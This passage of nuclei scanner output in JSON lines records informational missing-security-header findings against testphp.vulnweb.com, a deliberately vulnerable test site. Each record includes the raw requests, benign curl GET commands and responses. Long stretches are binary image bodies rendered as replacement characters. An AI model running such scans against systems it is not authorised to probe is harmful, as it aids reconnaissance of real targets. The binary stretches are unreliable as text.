{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:43.970235392Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:44.980382804Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\